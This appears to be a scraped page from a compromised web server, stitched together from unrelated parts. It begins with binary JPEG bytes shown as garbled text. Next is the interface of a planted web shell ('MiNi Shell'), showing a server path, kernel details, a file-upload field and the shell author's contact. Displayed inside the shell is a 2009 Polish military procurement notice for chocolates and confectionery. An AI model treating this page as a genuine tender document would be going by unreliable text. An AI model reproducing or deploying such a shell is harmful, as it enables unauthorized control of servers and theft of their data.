JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090902/145899-N-2009.html

<p class="kh_header"><b>Wrocław: dostawa czekolad, wyrobów cukierniczych i używek</b><br>
<b>Numer ogłoszenia: 145899 - 2009; data zamieszczenia: 02.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 1946 , ul. Poznańska 58, 50-984 Wrocław, woj. dolnośląskie, tel. 071 7663715, faks 071 7663701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.6rbm.sow.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa czekolad, wyrobów cukierniczych i używek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa czekolad, wyrobów cukierniczych i używek;
wartość szacunkowa zamówienia bez VAT wynosi:139065,00 zł..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.00-4, 15.84.22.20-0, 15.84.23.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium na całość przedmiotu zamówienia w wysokości 2700,00 (słownie: dwa tysiące siedemset złotych 00/100)  przy czym dla poszczególnych części wadium wynosi: 
część 1 - 2300,00 zł; część 2 - 400,00 zł;<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na podstawie 
art. 24 oraz spełniają warunki określone w art. 22 ust. 1 ustawy. Ocena spełniania warunków udziału w postępowaniu będzie przebiegać na podstawie listy dokumentów, jakie wykonawca ma obowiązek przedłożyć w swojej ofercie. Spełnianie powyższych warunków Zamawiający będzie oceniał według formuły spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.1.	oferta musi zawierać następujące dokumenty i oświadczenia:
6.1.1.	wypełniony formularz ofertowy (wg załącznika nr 1)
6.1.2.	oświadczenie określone w art. 22 ust.1 ustawy o zamówieniach publicznych (wg wzoru zawartego w załączniku nr 2); 
6.1.3.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
6.1.4.	decyzję Państwowego Powiatowego Inspektora Sanitarnego o zatwierdzeniu zakładu do wprowadzenia do obrotu produktów pochodzenia niezwierzęcego, określająca rodzaj i zakres działalności (art., 61 i art.62 ustawy z dnia 25 08.2006r. o bezpieczeństwie żywności i żywienia - Dz.U. nr 171 poz. 1225) w przypadku dostawców nie będących producentem przedmiotu zamówienia tj. nie wytwarzających w ramach produkcji pierwotnej
6.1.5.	dokument wystawiony dla Wykonawcy przez właściwy organ Państwowej Inspekcji Sanitarnej lub certyfikat wystawiony przez upoważnioną jednostkę certyfikująca, stwierdzający, że w procesie produkcji lub obrocie artykułami żywnościowymi jest stosowany system HACCP; PODSTAWA PRAWNA: ustawa z dnia 25.08.2006r. o bezpieczeństwie żywności i żywienia (Dz.U. nr 171 poz. 1225),
6.1.6.	pisemna zgoda na poddanie się rygorom procedur bezpieczeństwa realizowanych w trakcie przyjmowania dostaw przez Służby Dyżurne Jednostek Wojskowych (na załączniku nr 3) ;
6.1.7.	oświadczenie, że Wykonawca zagwarantuje dostawę przedmiotu zamówienia 
w odpowiednich ilościach do jednostek wojskowych zgodnie ze składanymi zamówieniami (na zał. nr 3);
6.1.8.	oświadczenie, że Wykonawca zagwarantuje, w szczególnie uzasadnionych przypadkach (m.in. szkolenie poligonowe, szkolenie rezerw osobowych, osiąganie wyższych stanów gotowości bojowej), zwiększenie ilości i częstotliwości dostaw w stosunku do wcześniej złożonych zamówień oraz dostawy do miejsc wskazanych przez Zamawiającego na terenie całego kraju (na zał. nr 3);
6.1.9.	w przypadku realizacji dostaw przez Podwykonawców, Zamawiający żąda, aby Wykonawca wskazał w ofercie w formie oświadczenia  (załącznik nr 4) nazwy i adresy Podwykonawców  oraz przedstawił wystawione dla nich dokumenty określone pkt. 6.1.4. 
6.1.10.	Wykonawca potwierdzi, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego w pkt. 3 siwz przedkładając przed podpisaniem umowy świadectwo jakości handlowej oferowanego produktu, wydanego przez uprawniony podmiot do kontroli jakości handlowej artykułów rolno - spożywczych (w rozumieniu ustawy z dnia 21 grudnia 2000r o jakości handlowej artykułów rolno - spożywczych (WIJHARS) tj. Wojewódzki Inspektorat Jakości Handlowej Artykułów Rolno - Spożywczych - wg wzoru stanowiącego załącznik do Rozporządzenia Ministra Rolnictwa Wsi z dnia 18 grudnia 2002r w sprawie wzoru świadectwa jakości handlowej (Dz.U Nr 230 poz 1932).
6.1.11.	dowód wniesienia wadium
6.1.12.	pełnomocnictwo - w przypadku podmiotów występujących wspólnie (spółka cywilna,  konsorcjum);.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.6rbm.sow.mil.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać osobiście w siedzibie Zamawiającego Wrocław ul. Poznańska 58 bud. 24 pok. 7  lub za pośrednictwem poczty.  Opłata za siwz 29,50 zł. przy odbiorze w siedzibie Zamawiającego (kasa czynna od poniedziałku do piątku od 11.00 do 13.00) lub za zaliczeniem pocztowym 36,00 zł. Prośby o przesłanie siwz proszę kierować na fax nr 071/7663701.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2009 godzina 09:00, miejsce: Oferty należy składać w siedzibie Zamawiającego w kancelarii jawnej bud. 13 pok. 113. Otwarcie ofert nastąpi w dniu 14.09.2009r. o godz. 11.00 w siedzibie Zamawiającego - bud.24  pok. nr 3..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZEKOLADY, WYROBY CUKIERNICZE,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa:CZEKOLADY, WYROBY CUKIERNICZE, 
wartość szacunkowa zamówienia bez VAT wynosi:118984,00 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.00-4, 15.84.22.20-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZEKOLADY, WYROBY CUKIERNICZE, UŻYWKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa:CZEKOLADY, WYROBY CUKIERNICZE, UŻYWKI;
wartość szacunkowa zamówienia bez VAT wynosi:20081,00 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.11.00-2, 15.84.20.00-2, 15.86.30.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com